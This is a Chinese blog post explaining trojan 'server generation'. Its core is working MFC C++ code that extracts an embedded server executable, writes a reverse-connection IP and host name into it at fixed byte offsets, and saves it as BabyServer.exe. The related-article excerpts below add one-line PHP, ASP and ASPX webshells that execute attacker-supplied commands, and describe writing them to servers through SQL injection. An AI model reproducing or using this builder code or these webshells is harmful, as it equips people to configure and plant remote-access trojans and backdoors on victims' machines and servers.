木马服务端生成技术详解

最新推荐文章于 2024-04-29 09:17:06 发布
最新推荐文章于 2024-04-29 09:17:06 发布
阅读量900 收藏 2
点赞数
分类专栏: vcbcbdelphi的window编程 文章标签: null server bi path 工具
用16进制工具   打开.EXE文件 找到要替换的内容地址 进行更新写入就可以了

注意点: 地址是从0开始的如下图所示的 地址应该是:0X5124 

 

其实改写代码如下:

 

 

void  ServerConfig::OnCreate() 
 {
    UpdateData();
    if(m_ip.IsEmpty()||m_name.IsEmpty())
    {
        MessageBox("请输入反向连接的IP地址和主机上线名称 ");
    }

    DWORD dwSize,dwWritten;
    HRSRC hr=FindResource(0,MAKEINTRESOURCE(IDR_SERVER),"SERVER");//查找资源
    if(hr==NULL) MessageBox("hr error");

    dwSize=SizeofResource(NULL,hr);

    HGLOBAL hg=LoadResource(NULL,hr);//加载资源

    if(hg==NULL) MessageBox("hg error");

    LPSTR lp=(LPSTR)LockResource(hg);//锁定资源

    if(lp==NULL) MessageBox("lp error");


    LPBYTE p=(LPBYTE)GlobalAlloc(GPTR, dwSize);  
    if (p==NULL)  MessageBox("lp error");
    
    CopyMemory((LPVOID)p, (LPCVOID)LockResource(hg), dwSize);                                    // 复制资源数据
    CopyMemory((LPVOID)(p+0x5020), (LPCVOID)m_name.LockBuffer(),MAX_PATH);            //写入主机名称信息
    CopyMemory((LPVOID)(p+0x5124), (LPCVOID)m_ip.LockBuffer(),15);    //写入主机名称信息

    /*本地文件路径*/

    CString SaveFilePath;
    BROWSEINFO bi;
    ZeroMemory(&bi,sizeof(BROWSEINFO));
    bi.hwndOwner=GetSafeHwnd();
    bi.lpszTitle="将文件保存到";
    LPITEMIDLIST idl=SHBrowseForFolder(&bi);
    if(idl==NULL)
        return;
    SHGetPathFromIDList(idl,SaveFilePath.LockBuffer());

    strcat(SaveFilePath.LockBuffer(),"/");
    strcat(SaveFilePath.LockBuffer(),"BabyServer.exe");



    HANDLE hFile;
    hFile = CreateFile(SaveFilePath.LockBuffer(),GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);//创建文件
    if(hFile == NULL)    MessageBox("file error");
    else                MessageBox("服务端文件生成成功!");
    WriteFile(hFile,(LPCVOID)p,dwSize,&dwWritten,NULL);//写入文件
    CloseHandle(hFile);

    
}

 

IDC_SERVER为引入的SERVER.EXE资源文件 SERVER为 资源类类型 

浅析木马服务端生成技术
马说@优快云
06-07 2801
  有些木马在解压缩之后只会有一个客户端程序,用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序,例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中,我将简要地探讨这一技术的实现。  事实上,这一技术并无神秘性可言,因为说穿了这一技术不过是对可执行文件的自定义资源进行操作罢了。也就是说,客户端程序本身绑有一段自定义的二进制数据,这段二进制数据实质上就是一个服务
木马生成技术详解
08-08 916
 有些木马在解压缩之后只会有一个客户端程序,用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序,例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中,我将简要地探讨这一技术的实现。    从“生成”的这个事实来看,我们可以猜想客户端程序可能本身绑有一段自定义的二进制数据,这段二进制数据实质上就是一个服务端的模板。在用户进行了设置工作之后,客户端就会将设置
木马服务端生成技术详解:模板与配置实例
总结来说,本文重点在于理解木马服务端生成的原理,即客户端如何根据用户输入动态生成具有特定功能的服务器端代码,这一过程涉及到基础的编程技术和数据填充机制。通过这个例子,读者可以更好地掌握这种技术在实际...
揭秘木马生成技术:客户端自定义服务端模板详解
木马技术浅析深入剖析了木马服务端生成技术的基本原理。通常,木马程序包含一个客户端组件,用户可以通过对其进行定制化设置,生成针对特定环境的服务端程序。这种生成机制依赖于客户端程序内部嵌套的自定义二进制...
内网安全:隧道技术详解
最新发布
zz12345600354的博客
04-29 1265
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2647
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
木马生成技术
zhoubaocun的专栏
04-02 595
作者:open来源:opens Blog经常会看到鸽子或一些木马可以自定义生成一个服务端程序,开始很奇怪,他是怎么做到的!后来去网上搜了下,但是没找到相关文章! 后来碰巧得到了一个QQ病毒的源代码,而这个程序就可以生成一个文件,于是就研究了下代码,但是收获不大,但是很实用,他的大致思路和鸽子是一样的:原理一:在程序的尾部追加数据,然后程序运行时从尾部读取数据,这个方法看似容易,但是实际操作的时候
浅析木马服务端生成技术.pdf
01-08
浅析木马服务端生成技术.pdf 浅析木马服务端生成技术.pdf 浅析木马服务端生成技术.pdf
汇编实现木马生成技术
04-25 2334
文章作者:asm[C.R.S.T]信息来源:邪恶八进制信息安全团队此文章仅作技术研究之用,请勿用于非法用途,由此带来的一切后果自负。与作者和邪恶八进制无关! 注:代码采用MASM32格式编写,全部测试通过--嘿嘿,不通过的代码不敢发布误人子弟^_^写这篇文章的目的是回顾一下这几天关于探究木马生成技术的过程.在我学习中,很多人给了我帮助,男女都有,有火狐的,有邪恶八进制的,红狼的,在此感谢 ^_^ 
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 3168
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
Kali Linux渗透测试之Msfvenom木马生成与攻防实战
02-25
一、课程概要       本课程主要分享Kali Linux渗透测试之Msfvenom木马生成与攻防实战技巧!二、适合人员      1、零基础大学生      2、IT技术人员      3、服务器运维工程师      4、渗透测试工程师三、特别说明       1、本课程支持一次购买,享受永久观看!       2、本课程支持一次购买,享受永久更新!       3、本课程系讲师原创课程,如有盗用,欢迎举报!
利用网站上传漏洞使用一句话木马控制服务器
weixin_33962621的博客
06-18 1825
一句话木马 常用于php、asp、aspx php <?php echo shell_exec($_GET['cmd']);?> asp <%execute(request("value"))%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["value"...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值